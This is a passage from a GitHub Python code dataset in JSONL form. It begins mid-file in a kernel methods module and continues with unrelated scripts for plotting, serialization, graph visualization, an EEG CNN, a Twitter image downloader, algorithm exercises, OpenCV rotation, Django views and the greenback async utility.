self.get_kernel_gram_matrix(X, self.sigma)\n            self.K_train = K\n\n        assert K.shape[0] == y.shape[0]\n        n = K.shape[0]\n\n        if W is None:\n            # unweighted KRR := all weights are equal to 1 and W:=Identity\n            # fixed: the regularized system is (K + n*penalty*I) v = y\n            M = K + n * penalty * np.eye(n)\n            M_ = scipy.linalg.inv(M)\n            v = M_ @ y\n\n        else:\n\n            W_sqrt = np.diag(np.sqrt(np.diag(W)))\n            v = W_sqrt @ y\n            M = K @ W_sqrt\n            M = W_sqrt @ M + n * penalty * np.eye(n)\n            M_ = scipy.linalg.inv(M)\n            v = M_ @ v\n            v = W_sqrt @ v\n\n        print('fitted train data')\n        self.weights = v\n        # fixed: return the weights so callers such as KernelLogisticRegression can use them\n        return self.weights\n\n\nclass KernelLogisticRegression():\n    \"\"\"\n    Kernel Logistic regression\n    \"\"\"\n\n    def __init__(self, kernel='gaussian', sigma=1):\n        self.weights = None\n        self.kernel = kernel  # fixed: was assigned the literal string 'kernel'\n        self.sigma = sigma\n        self.loss_thresh = 0.001\n        self.X_train = None\n\n        # initialize weighted kernel ridge regression for self.fit\n        self.wkrr = WKRR(sigma=sigma)\n\n    def get_kernel_gram_matrix(self, X, sigma):\n\n        if self.kernel == 'gaussian':\n            # Faster computation of the gram matrix with gaussian kernel\n            # st= time.time()\n            pairwise_dists = squareform(pdist(X, 'sqeuclidean'))\n            K = np.exp(-pairwise_dists / (2 * np.square(sigma)))\n            # print(time.time()-st)\n            return K\n\n    def fit(self, X, y, penalty, max_iter=1000, eps=1e-6):\n        \"\"\"\n        Iteratively solve Weighted Kernel Ridge Regression problems\n        \"\"\"\n\n        self.X_train = X\n        K = self.get_kernel_gram_matrix(X, self.sigma)\n        self.wkrr.K_train = K\n\n        # For training only, transform labels into {1,-1}\n        # fixed: the mapping produced {1,0}, which breaks the logistic loss below\n        y = np.where(y == 1, 1, -1)\n\n        assert K.shape[0] == y.shape[0]\n        n = K.shape[0]\n        ones = np.ones(y.shape)\n\n        # randomly initialize the coefficients\n        alpha = np.random.normal(loc=0, scale=1, size=n)\n\n        # t1 = time.time()\n\n        # initialize loss\n        loss = 10\n\n        for i in range(max_iter):\n            # At each iteration solve a Weighted kernel ridge regression\n            v = K @ alpha\n            prev_loss = loss\n            loss = -np.sum(np.log(expit(np.multiply(y, v)) + eps)) / n\n            print(loss)\n            if np.abs(loss - prev_loss) < self.loss_thresh:\n                print('converged after {} iterations'.format(i + 1))\n                break\n\n            # compute parameters for WKRR\n            u = np.multiply(v, y)\n            sig = expit(u)\n            sig_ = ones - sig  # 1-sig = expit(-u)\n            W = np.diag(np.multiply(sig, (sig_)))\n            # print(W.shape)\n            P = np.diag(-sig_)\n            k = P @ y\n            z = v - scipy.linalg.inv(W) @ k\n            # t2 = time.time()\n            # print(t2-t1)\n\n            # solve a weighted Kernel Ridge Regression with the corresponding parameters\n            # fixed: dropped a stray positional 'sigma' argument that bound to W\n            alpha = self.wkrr.fit(X, z, penalty, W=W, kernel_precomputed=True)\n            # t3 = time.time()\n            # print(t3-t2)\n\n        # save fitted parameters\n        self.weights = alpha\n\n    def predict_probas(self, X):\n\n        try:\n            assert self.kernel == 'gaussian'\n            # compute pairwise (squared euclidean) distances between new samples and train samples\n            pairwise_dists = cdist(self.X_train, X, 'sqeuclidean')\n            # gaussian kernel evaluations\n            K_pred = np.exp(-pairwise_dists / (2 * np.square(self.sigma)))\n\n            pred_probas = expit(K_pred.T @ self.weights)\n            return pred_probas\n\n        except:\n            print('Please make sure the used kernel is gaussian.')\n\n    def predict(self, X):\n        probas = self.predict_probas(X=X)\n        return (probas > 0.5).astype(int)\n\n    def get_accuracy_score(self, X, y):\n        pred_labels = self.predict(X=X)\n        return (pred_labels == y).mean()\n\n\nclass KernelPCA():\n\n    def __init__(self, n_components):\n        self.number_components = n_components\n\n    # @staticmethod\n    def get_wanted_eigenvectors_eigenvalues(self, w, v, ):\n        # fixed: eigenvectors are the columns of v, not its rows\n        L = [(w[i], v[:, i]) for i in range(w.shape[0])]\n        L = sorted(L, key=lambda x: x[0], reverse=True)\n        return np.array([L[i][0] for i in range(self.number_components)]), \\\n               np.array([L[i][1] for i in range(self.number_components)])\n\n    def fit_transform(self, K, eps=1e-6):\n        n = K.shape[0]\n        U = (1 / n) * np.ones((n, n))\n        centred_K = (np.eye(n) - U) @ K @ (np.eye(n) - U)\n\n        w, v = np.linalg.eig(centred_K)\n        # We had some negative/complex eigen values even if the matrix is symmetric which \n        # can mainly be due to some approximations made when computing the eigenvectors \n        w = np.array(list(map(lambda x: x.real if x.real > 0 else eps, w)))\n        v = np.real(v)\n        w, v = self.get_wanted_eigenvectors_eigenvalues(w, v)\n\n        alpha = v / np.sqrt(w[:, None])\n        self.alpha = alpha\n\n        return K @ alpha.T\n\n    def transform(self, X):\n        return X @ self.alpha.T","repo_name":"MedAmineHachicha/kernel_methods_challenge","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"19906744284","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef printsomething():\n print(\"Something\")\n\n#display function\ndef runtime_display(display, u, x, xmin,xmax,ymin,ymax):\n plt.axis([xmin, xmax, ymin, ymax ] )\n plt.title(display)\n plt.ylabel(\"U\")\n plt.xlabel(\"x\")\n plt.plot(x,u,'bo-')\n plt.pause(0.001)\n plt.clf() #clear drawing\n return 0\n","repo_name":"izham-sugita/ENT441-CFD","sub_path":"ent441-slides/codes/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"19494238042","text":"\"\"\"\nThis is a numpy reader/ writer module.\n\"\"\"\n# import standard modules\nimport numpy\n# help(numpy)\n\n# import custom modules\nfrom serializers.serialize_template import Serializer\n\n# define private variables\n__version__ = \"1.0.0\"\n\n# define class variables\nSerializer.SERIALIZER_TYPE = \"npy\"\n\n\nclass SerializeFile(Serializer):\n def __init__(self):\n # get the input data\n Serializer.__init__(self)\n self.DATA_TYPE = \"dictionary\"\n\n def read(self, f_name=\"\"):\n \"\"\"\n read the numpy file.\n :param f_name: file input name.\n :return: True for success. False for failure.\n \"\"\"\n success = Serializer.read(self, f_name=f_name)\n\n if not success:\n raise IOError(\"[No File] :: There is no file to read from.\")\n try:\n rdata = numpy.load(self.OUTPUT_PATH, encoding='bytes', allow_pickle=True)\n self.READ_DATA = rdata.tolist()\n return True\n except ValueError:\n return False\n\n def write(self, f_output=\"\", f_data=\"\"):\n \"\"\"\n writes the numpy file.\n :param f_output: custom file output name.\n :param f_data: data to write.\n :return: True for success. False for failure.\n \"\"\"\n Serializer.write(self, f_output=f_output, f_data=f_data)\n\n try:\n numpy.save(self.OUTPUT_PATH, self.INTERPRETED_INPUT_DATA)\n self.print_file_size()\n return True\n except ValueError:\n return False\n","repo_name":"AlexGaida/data_serializer","sub_path":"python/serializers/serialize_numpy.py","file_name":"serialize_numpy.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14045645733","text":"import json\nimport os\nimport uuid\nfrom tempfile import NamedTemporaryFile\nfrom typing import List\n\nimport pkg_resources\nimport py2neo\nfrom IPython.display import HTML, IFrame, Image, display_html\nfrom jinja2 import Environment, FileSystemLoader\n\n\ndef plot(\n    graph: py2neo.Graph, query: str = \"match p=()--()--() return p limit 25\", **kwargs\n) -> IFrame:\n    \"\"\"Plot a graph, using a query.\n\n    Heavy lifting is done via py2neo `to_subgraph` and `neographviz.vis_network`\n\n    Example:\n        >>> from neographviz import plot, Graph\n        >>> graph = Graph() # You need a graph at localhost, or pass the uri here.\n        >>> plot(graph)\n\n    Args:\n        graph (py2neo.Graph): Graph object from py2neo\n        query (str, optional): Any valid cypher query, must return a path p, should use a limit. Defaults to \"match p=()--()--() return p limit 25\".\n\n    Returns:\n        IFrame: IFrame to show in jupyter notebook or website.\n    \"\"\"\n    sg = graph.run(query).to_subgraph()\n    return vis_network(_get_nodes(sg), _get_edges(sg), **kwargs)\n\n\ndef _get_nodes(sg: py2neo.Subgraph) -> List[dict]:\n    \"\"\"Get nodes from a subgraph\n    \n    Get the nodes in a subgraph and add the data so that\n    visjs can consume it. \n\n    Arguments:\n        sg {py2neo.Subgraph} -- \n    \n    Returns:\n        List -- List of dictionaries with keys: id, group, label, title\n    \"\"\"\n    nodes = []\n    if sg:\n        for n in sg.nodes:\n            nodes.append(\n                {\n                    \"id\": n.identity,\n                    \"group\": n.labels.__str__()[1:],\n                    \"label\": \" \".join([f\"{v}\" for v in n.values()]),\n                    \"title\": \" \".join([f\"{k}:{v}\" for k, v in n.items()]),\n                }\n            )\n    return nodes\n\n\ndef _get_edges(sg: py2neo.Subgraph) -> List:\n    edges = []\n    if sg:\n        for r in sg.relationships:\n            d = {\n                \"from\": r.start_node.identity,\n                \"to\": r.end_node.identity,\n                \"label\": next(iter(r.types())),\n                \"arrows\": \"to\",\n            }\n            try:\n                d[\"title\"] = \" \".join([str(k) + \":\" + str(v) for k, v in r.items()])\n            except Exception:\n                pass\n            edges.append(d)\n    return edges\n\n\ndef vis_network(\n    nodes,\n    edges,\n    physics=\"\",\n    height=400,\n    node_size=25,\n    font_size=14,\n    filename=\"\",\n    config={},\n    template_file=\"vis.html\",\n    app=False,\n):\n    \"\"\"Render a network with vis.js in an IFrame for use in a jupyter notebook or website. \n\n    This function will render a template which uses vis.js to display the graph. \n    The options configured can be passed directly to the template, but as it is vis.js underneath,\n    any valid options for it can be passed as js in string form to jsoptions.\n\n    Args:\n        nodes (List): List of nodes\n        edges (List): List of edges\n        physics (str, optional): Definition of physics in vis.js. Defaults to basic barnesHut.\n        height (int, optional): Height of the plot in pixels. Defaults to 400.\n        node_size (int, optional): Defaults to 25.\n        font_size (int, optional): [description]. Defaults to 14.\n        filename (str, optional): Optional filename for storing the page. Defaults to `''`, in which case a uuid-based name is used.\n        config (dict, optional): Custom kwargs to pass to template. 
Defaults to `{}`.\n template_file (str, optional): Defaults to `vis.html` the provided template, provide your own.\n\n Returns:\n IFrame: Iframe to show in jupyter notebook\n \"\"\"\n template = pkg_resources.resource_filename(\"neographviz\", \"templates/\")\n env = Environment(loader=FileSystemLoader(template))\n template = env.get_template(template_file)\n if not physics:\n physics = \"\"\"{\n \"barnesHut\": {\n \"centralGravity\": 0,\n \"springLength\": 240\n }\n }\"\"\"\n\n if not app:\n html = template.render(\n nodes=nodes,\n edges=edges,\n physics=physics,\n node_size=node_size,\n font_size=font_size,\n )\n unique_id = str(uuid.uuid4())\n if not filename:\n filename = \"figure/graph-{}.html\".format(unique_id)\n try:\n with open(filename, \"w\") as file:\n file.write(html)\n except FileNotFoundError:\n os.mkdir(\"figure\")\n with open(filename, \"w\") as file:\n file.write(html)\n\n return IFrame(filename, width=\"100%\", height=str(height))\n else:\n return template.render(\n nodes=nodes,\n edges=edges,\n physics=physics,\n node_size=node_size,\n font_size=font_size,\n app=app\n )\n\n\ndef get_vis_info(node, id, options):\n node_label = list(node.labels)[0]\n title = \"\".join([f\"{k}:{v} \" for k, v in node.items()]).strip()\n if node_label in options:\n vis_label = node.get(options.get(node_label, \"\"), \"\")\n else:\n vis_label = title\n\n return {\"id\": id, \"label\": vis_label, \"group\": node_label, \"title\": title}\n","repo_name":"niiicolai/PythonOverlay","sub_path":"venv/Lib/site-packages/neographviz/vis.py","file_name":"vis.py","file_ext":"py","file_size_in_byte":5089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"5995083741","text":"import sys\n\nn, m = map(int, sys.stdin.readline().split())\nnumlist = list(map(int, sys.stdin.readline().split()))\nresult = []\nans = 0\n\n\ndef dfs(start):\n    global ans\n    if len(result) == 3:\n        total = sum(result)\n        # keep the best sum of three cards that does not exceed m\n        if total <= m and total > ans:\n            ans = total\n        return\n    for i in range(start, n):\n        result.append(numlist[i])\n        dfs(i + 1)\n        result.pop()\n\n\ndfs(0)\nprint(ans)\n","repo_name":"Lee9Bin/python_algorism","sub_path":"algorism/daily/2798.py","file_name":"2798.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"16380681523","text":"# Convolutional Neural Network for EEG classification\n\nimport os\nimport numpy as np\nimport network\n\nfrom pylab import imshow, show, cm\nfrom network import Network, shared, relu\nfrom network import ConvLayer, ConvPoolLayer, FullyConnectedLayer, SoftmaxLayer\n\n# Load EEG data\nparent_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))\ndata_dir = os.path.join(parent_dir, \"data\")\n\ndata = np.load(os.path.join(data_dir, 'all_data_6_1d_full.npy'))\n\nlabels = np.load(os.path.join(data_dir, 'all_data_6_1d_full_labels.npy'))\nlabels = labels[:,1]\n\n# Create train, validation, test sets\n#rng = np.random.RandomState(225)\nindices = np.random.permutation(data.shape[0])\n\nsplit_train, split_val, split_test = .6, .2, .2\n\nsplit_train = int(round(data.shape[0]*split_train))\nsplit_val = split_train + int(round(data.shape[0]*split_val))\n\ntrain_idx = indices[:split_train]\nval_idx = indices[split_train:split_val]\ntest_idx = indices[split_val:]\n\ntr_data = data[train_idx,:]\ntr_labels = labels[train_idx]\n\nval_data = data[val_idx,:]\nval_labels = labels[val_idx]\n\nte_data = data[test_idx,:]\nte_labels = labels[test_idx]\n\ntrain_data = shared((tr_data, tr_labels))\nvalidation_data = shared((val_data, val_labels))\ntest_data = shared((te_data, te_labels))\n\n# Show a single random trial\nimage_num = np.random.randint(0, network.size(train_data))\nimage_label = str(train_data[1][image_num].eval())\nimage_array = train_data[0][image_num].eval()\nimage_2d = np.reshape(image_array, (64, 512))\n\nimshow(image_2d, cmap=cm.gray)\nshow()\nprint(\"Label: {}\".format(image_label))\n\n# Train\nmini_batch_size = 10\n\ndef basic_conv(n=3, epochs=60):\n nets = [] # list of networks (for ensemble, if desired)\n for j in range(n):\n net = Network([\n ConvLayer(image_shape=(mini_batch_size, 1, 64, 512),\n filter_shape=(20, 1, 3, 3), stride=(1, 1), activation_fn=relu),\n ConvPoolLayer(image_shape=(mini_batch_size, 20, 64, 512),\n filter_shape=(40, 20, 3, 3), stride=(1, 1),\n poolsize=(2, 2), activation_fn=relu),\n ConvPoolLayer(image_shape=(mini_batch_size, 40, 32, 256),\n filter_shape=(80, 40, 3, 3), stride=(1, 1),\n poolsize=(2, 2), activation_fn=relu),\n FullyConnectedLayer(n_in=80*16*128, n_out=100),\n SoftmaxLayer(n_in=100, n_out=2)],\n mini_batch_size, 50)\n \n net.SGD(train_data, epochs, mini_batch_size, 0.1,\n validation_data, test_data, lmbda=0.0)\n \n nets.append(net) # Add current network to list\n return nets\n\nconv_net = basic_conv(n=1, epochs=2)\n\n# Plot training curve for 1 network\nconv_net[0].plot_training_curve()\n\n# Plot validation/test accuracy curve for 1 network\nconv_net[0].plot_accuracy_curve()\n\n# Create a plot of the learned filters for first conv layer\nconv_net[0].layers[0].plot_filters(4, 5, \"Filters - Layer 1\") # 20 filters\n","repo_name":"sho-87/python-machine-learning","sub_path":"CNN/eeg.py","file_name":"eeg.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"23958096792","text":"\nimport tweepy\nimport wget\n\n\nconsumerKey = \"Your key here\"\nconsumerSecret = \"Your key here\"\naccessToken = \"Your key here\"\naccessTokenSecret = \"Your key here\"\n\nauth = tweepy.OAuthHandler(consumer_key = consumerKey, consumer_secret = consumerSecret)\nauth.set_access_token(accessToken , accessTokenSecret)\napi = tweepy.API(auth)\n\nsearchTerm = input(\"Enter the hashtag to search for \")\nn = int(input(\"Enter the number of tweets to search for \"))\n\ntweets = tweepy.Cursor(api.search, q = searchTerm, result_type = \"recent\").items(n)\n\nneg = 0\npos = 0\nneu = 0\npol = 0\n\nmedia_url = []\n\nfor tweet in tweets:\n\n media = tweet.entities.get('media',[])\n if(len(media)):\n media_url.append(media[0]['media_url'])\n\ni = 1\n\nfor media in media_url:\n wget.download(media, out = str(i) + \".jpg\")\n i+=1\n","repo_name":"Anmay5525/Image_extractor","sub_path":"img_extract.py","file_name":"img_extract.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"17562573375","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def mergeTwoLists(self, list1: Optional[ListNode], list2: Optional[ListNode]) -> Optional[ListNode]:\n list1_cur = list1\n list2_cur = list2\n answer = ListNode()\n answer_cur = answer\n \n while list1_cur and list2_cur:\n if list1_cur.val <= list2_cur.val: \n answer_cur.next = ListNode(list1_cur.val)\n list1_cur = list1_cur.next\n else: \n answer_cur.next = ListNode(list2_cur.val)\n list2_cur = list2_cur.next\n answer_cur = answer_cur.next\n \n if list1_cur: \n answer_cur.next = list1_cur\n elif list2_cur: \n answer_cur.next = list2_cur\n \n return answer.next","repo_name":"python-algorithm-study-and-learning/Sangjun","sub_path":"ch08/08-14.py","file_name":"08-14.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23061546641","text":"import collections\nfrom typing import List\n\nfrom bst_node import BstNode\nfrom test_framework import generic_test\n\nInterval = collections.namedtuple('Interval', ('left', 'right'))\n\n\n# def range_lookup_in_bst(tree: BstNode, interval: Interval) -> List[int]:\n# def in_order(tree):\n# if not tree:\n# return\n# in_order(tree.left)\n# if interval.left <= tree.data <= interval.right:\n# result.append(tree.data)\n# in_order(tree.right)\n#\n# result = []\n# in_order(tree)\n# return result\n\ndef range_lookup_in_bst(tree: BstNode, interval: Interval) -> List[int]:\n\n def f(tree):\n if not tree:\n return\n if interval.left <= tree.data <= interval.right:\n f(tree.left)\n result.append(tree.data)\n f(tree.right)\n elif tree.data > interval.left:\n f(tree.left)\n else:\n f(tree.right)\n\n result = []\n f(tree)\n return result\n\ndef range_lookup_in_bst_wrapper(tree, i):\n return range_lookup_in_bst(tree, Interval(*i))\n\n\nif __name__ == '__main__':\n exit(\n generic_test.generic_test_main('range_lookup_in_bst.py',\n 'range_lookup_in_bst.tsv',\n range_lookup_in_bst_wrapper))\n","repo_name":"prrraveen/Elements_of_programming_interview","sub_path":"epi_judge_python/range_lookup_in_bst.py","file_name":"range_lookup_in_bst.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7284263601","text":"\nimport numpy as np, cv2\ndef contain(p, shape): # 좌표(y,x)가 범위내 인지 검사\n return 0<= p[0] < shape[0] and 0<= p[1] < shape[1]\n\ndef bilinear_value(img, pt):\n x, y = np.int32(pt)\n if x >= img.shape[1]-1: x = x -1\n if y >= img.shape[0]-1: y = y - 1\n\n P1, P3, P2, P4 = np.float32(img[y:y+2,x:x+2].flatten())\n alpha, beta = pt[1] - y, pt[0] - x # 거리 비율\n M1 = P1 + alpha * (P3 - P1) # 1차 보간\n M2 = P2 + alpha * (P4 - P2)\n P = M1 + beta * (M2 - M1) # 2차 보간\n return np.clip(P, 0, 255) # 화소값 saturation후 반환\n\n\ndef calc_length(pts):\n d1 = np.subtract(pts[0], pts[1]).astype(float) # 두 좌표간 차분 계산\n length =(d1[0]**2+d1[1]**2)**0.5\n return (length)\n\ndef calc_gragient(pts):\n d1 = np.subtract(pts[0], pts[1]).astype(float) # 두 좌표간 차분 계산\n angle = cv2.fastAtan2(d1[0], d1[1]) # 차분으로 각도 계산\n return (angle)\n\n\ndef rotate(img, degree):\n dst = np.zeros(img.shape[:2], img.dtype) # 목적 영상 생성\n radian = (degree/180) * np.pi # 회전 각도 - 라디언\n sin, cos = np.sin(radian), np.cos(radian) # 사인, 코사인 값 미리 계산\n for i in range(img.shape[0]): # 목적 영상 순회 - 역방향 사상\n for j in range(img.shape[1]):\n y = -j * sin + i * cos\n x = j * cos + i * sin # 회선 변환 수식\n if contain((y, x), img.shape): # 입력 영상의 범위 확인\n dst[i, j] = bilinear_value(img, [x, y]) # 화소값 양선형 보간\n return dst\n\n\n\ndef draw_point(x, y):\n pts.append([x,y])\n print(\"좌표:\", len(pts), [x,y])\n cv2.circle(tmp, (x, y), 2, 255, 2) # 중심 좌표 표시\n\ndef onMouse(event, x, y, flags, param):\n global tmp, pts\n if (event == cv2.EVENT_LBUTTONDOWN and len(pts) == 0): \n draw_point(x, y)\n if (event == cv2.EVENT_LBUTTONUP and len(pts) == 1): \n draw_point(x, y)\n if len(pts) == 2:\n cv2.line(image, tuple(pts[0]), tuple(pts[1]), 255)\n legth = calc_length(pts) # 회전각 계산\n print(\"length : %3.2f\" % legth)\n angle = calc_gragient(pts) # 회전각 계산\n print(\"gradient : %3.2f\" % angle)\n dst = rotate(image, angle) # 사용자 정의 함수 회전 수행\n cv2.imshow(\"image\", dst) \n tmp = np.copy(image) # 임시 행렬 초기화\n pts = []\n\nimage = cv2.imread('images/rotate.jpg', cv2.IMREAD_GRAYSCALE)\nif image is None: raise Exception(\"영상 파일을 읽기 에러\")\ntmp = np.copy(image)\npts = []\n\ncv2.imshow(\"image\", image)\ncv2.setMouseCallback(\"image\", onMouse, 0)\ncv2.waitKey(0)","repo_name":"ksyeun/2022_1_SSU_AI_Computer-Vision","sub_path":"Exercise Problem/exercise815.py","file_name":"exercise815.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31907280768","text":"from django.shortcuts import get_object_or_404, render\nfrom .models import Book\nfrom django.http import Http404\nfrom django.db.models import Avg\n# Create your views here.\n\n\ndef index(request):\n all_books = Book.objects.all().order_by(\"rating\") # you can put -\n nofbooks = all_books.count()\n avg_rating = all_books.aggregate(Avg(\"rating\")) # rating__avg, rating__min\n\n return render(request, \"book_outlet/index.html\", {\n \"books\": all_books,\n \"total_number_of_books\": nofbooks,\n \"average_rating\": avg_rating,\n })\n\n\ndef book_detail(request, slug):\n # try:\n # book = Book.objects.get(pk=id)\n # except:\n # raise Http404()\n book = get_object_or_404(Book, slug=slug)\n return render(request, \"book_outlet/book_detail.html\", {\n \"title\": book.title,\n \"author\": book.author,\n \"rating\": book.rating,\n \"is_bestselling\": book.is_bestselling\n })\n","repo_name":"tahaenesaslanturk/book_store","sub_path":"book_outlet/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"12912354233","text":"import sys\nfrom functools import wraps\nfrom typing import (\n Any,\n AsyncIterable,\n AsyncGenerator,\n AsyncContextManager,\n Iterator,\n Awaitable,\n Callable,\n Generic,\n Optional,\n TypeVar,\n cast,\n overload,\n)\nfrom ._impl import await_, with_portal_run_sync\n\nT = TypeVar(\"T\")\nF = TypeVar(\"F\", bound=Callable[..., Any])\nAF = TypeVar(\"AF\", bound=Callable[..., Awaitable[Any]])\n\n\ndef autoawait(fn: Callable[..., Awaitable[T]]) -> Callable[..., T]:\n \"\"\"Decorator for an async function which allows (and requires) it to be called\n from synchronous contexts without ``await``.\n\n For example, this can be used for magic methods, property setters, and so on.\n \"\"\"\n\n @wraps(fn)\n def wrapper(*args: Any, **kw: Any) -> T:\n return await_(fn(*args, **kw))\n\n return wrapper\n\n\n# For signature-preserving decorators we can declare the result as\n# signature-preserving too, and catch the case where the inner function isn't async\n@overload\ndef decorate_as_sync(decorator: Callable[[F], F]) -> Callable[[AF], AF]:\n ...\n\n\n# For non-signature-preserving, all we can do is say the inner function and\n# the decorated function are both async. (This could be improved using ParamSpec\n# for decorators that are args-preserving but not return-type-preserving.)\n@overload\ndef decorate_as_sync(\n decorator: Callable[..., Any]\n) -> Callable[[Callable[..., Awaitable[Any]]], Callable[..., Awaitable[Any]]]:\n ...\n\n\ndef decorate_as_sync(decorator: Any) -> Any:\n \"\"\"Wrap the synchronous function decorator *decorator* so that it can\n be used to decorate an async function.\n\n This can be used, for example, to apply an async-naive decorator such as\n `@functools.lru_cache() ` to an async function::\n\n @greenback.decorate_as_sync(functools.lru_cache(maxsize=128))\n async def some_fn(...): ...\n\n Without the wrapping in :func:`decorate_as_sync`, the LRU cache\n would treat the inner function as a synchronous function, and\n would therefore unhelpfully cache the coroutine object that is\n returned when an async function is called without ``await``.\n\n Internally, the \"inner\" async function is wrapped in a synchronous\n function that invokes that async function using\n :func:`greenback.await_`. This synchronous function is then\n decorated with the *decorator*. 
:func:`decorate_as_sync` returns\n an \"outer\" async function which invokes the internal decorated\n synchronous function using :func:`greenback.with_portal_run_sync`.\n\n In other words, the following two calls behave identically::\n\n result = await greenback.decorate_as_sync(decorator)(async_fn)(*args, **kwds)\n result = await greenback.with_portal_run_sync(\n decorator(greenback.autoawait(async_fn)), *args, **kwds,\n )\n\n \"\"\"\n\n def decorate(async_fn: Any) -> Any:\n @decorator # type: ignore # \"Untyped decorator makes 'inner' untyped\"\n @wraps(async_fn)\n def inner(*args: Any, **kwds: Any) -> Any:\n return await_(async_fn(*args, **kwds))\n\n @wraps(inner)\n async def outer(*args: Any, **kwds: Any) -> Any:\n return await with_portal_run_sync(inner, *args, **kwds)\n\n return outer\n\n return decorate\n\n\nclass async_context(Generic[T]):\n \"\"\"Wraps an async context manager so it is usable in a synchronous\n ``with`` statement.\"\"\"\n\n __slots__ = (\"_cm\", \"_aexit\")\n\n def __init__(self, cm: AsyncContextManager[T]):\n self._cm = cm\n\n if sys.version_info >= (3, 11):\n\n def __enter__(self) -> T:\n try:\n aenter = type(self._cm).__aenter__\n except AttributeError:\n raise TypeError(\n f\"{type(self._cm).__name__!r} object does not support the \"\n \"asynchronous context manager protocol\"\n ) from None\n try:\n self._aexit = type(self._cm).__aexit__\n except AttributeError:\n raise TypeError(\n f\"{type(self._cm).__name__!r} object does not support the \"\n \"asynchronous context manager protocol (missed __aexit__ method)\"\n ) from None\n return await_(aenter(self._cm))\n\n else:\n\n def __enter__(self) -> T:\n try:\n self._aexit = type(self._cm).__aexit__\n except AttributeError:\n raise AttributeError(\n f\"type object {type(self._cm).__name__!r} has no attribute '__aexit__'\"\n ) from None\n aenter = type(self._cm).__aenter__\n return await_(aenter(self._cm)) # type: ignore\n\n def __exit__(self, *exc: Any) -> Optional[bool]:\n return await_(self._aexit(self._cm, *exc)) # type: ignore\n\n\nclass async_iter(Generic[T]):\n \"\"\"Wraps an async iterator so it is usable in a synchronous\n ``for`` loop, ``yield from`` statement, or other context that expects\n a synchronous iterator.\"\"\"\n\n __slots__ = (\"_it\",)\n\n def __init__(self, iterable: AsyncIterable[T]):\n try:\n aiter = type(iterable).__aiter__\n except AttributeError:\n raise TypeError(\n \"'async_iter' requires an object with __aiter__ method, got \"\n + type(iterable).__name__\n ) from None\n self._it = aiter(iterable) # type: ignore\n try:\n type(self._it).__anext__\n except AttributeError:\n raise TypeError(\n \"'async_iter' received an object from __aiter__ that does not \"\n \"implement __anext__: \" + type(self._it).__name__\n ) from None\n if all(hasattr(self._it, meth) for meth in (\"asend\", \"athrow\", \"aclose\")):\n self.__class__ = async_generator\n\n def __iter__(self) -> Iterator[T]:\n return self\n\n def __next__(self) -> T:\n try:\n return await_(type(self._it).__anext__(self._it)) # type: ignore\n except StopAsyncIteration as ex:\n raise StopIteration(*ex.args)\n\n\nclass async_generator(async_iter[T]):\n __slots__ = ()\n\n def send(self, val: Any) -> T:\n try:\n return await_(cast(AsyncGenerator[T, Any], self._it).asend(val))\n except StopAsyncIteration as ex:\n raise StopIteration(*ex.args)\n\n def throw(self, *exc: Any) -> T:\n try:\n return await_(cast(AsyncGenerator[T, Any], self._it).athrow(*exc))\n except StopAsyncIteration as ex:\n raise StopIteration(*ex.args)\n\n def close(self) 
-> None:\n return await_(cast(AsyncGenerator[T, Any], self._it).aclose())\n","repo_name":"oremanj/greenback","sub_path":"greenback/_util.py","file_name":"_util.py","file_ext":"py","file_size_in_byte":6654,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"69"}
+{"seq_id":"73130414620","text":"import json\nimport click\nfrom vl_bench.utils import process_path\n\n@click.command()\n@click.argument('inputs', nargs=-1)\n@click.option('--output', required=True)\ndef main(inputs, output):\n merged = {}\n for input_file in inputs:\n filepath = process_path(input_file)\n with open(filepath, 'r') as f:\n merged.update(json.load(f))\n \n with open(process_path(output), 'w') as f:\n json.dump(merged, f, indent=4)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"ilkerkesen/ViLMA","sub_path":"tasks/counting/merge_result_files.py","file_name":"merge_result_files.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
